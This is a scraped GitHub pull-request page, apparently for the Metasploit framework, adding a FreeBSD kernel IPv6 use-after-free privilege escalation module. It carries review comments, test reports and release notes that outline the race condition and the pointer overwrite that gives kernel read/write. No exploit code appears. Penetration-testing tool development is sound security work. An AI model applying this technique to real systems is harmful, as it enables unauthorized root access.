-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837
Add FreeBSD ip6_setpktopt Use-After-Free Privilege Escalation module #13837
Conversation
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Reviewed and left a few minor change requests, code looks great over all.
documentation/modules/exploit/freebsd/local/ip6_setpktopt_uaf_priv_esc.md
Outdated
Show resolved
Hide resolved
Well testing this from the current branch fails with the following error. If you could rebase this work onto
I moved past that though and tested it from a merged state at which point it appears to have failed to compile. The target is a stock FreeBSD 12.0 system with
|
|
5273c5e
to
95b99ce
Compare
Alright tested successfully with a session opened via Testing output
|
Release NotesNew module |
This module exploits a race and use-after-free vulnerability in the
FreeBSD kernel IPv6 socket handling. A missing synchronization lock
in the
IPV6_2292PKTOPTIONS
option handling insetsockopt
permitsracing
ip6_setpktopt
access to a freedip6_pktopts
struct.This exploit overwrites the
ip6po_pktinfo
pointer of aip6_pktopts
struct in freed memory to achieve arbitrary kernel read/write.
This module has been tested successfully on:
Resolves #13826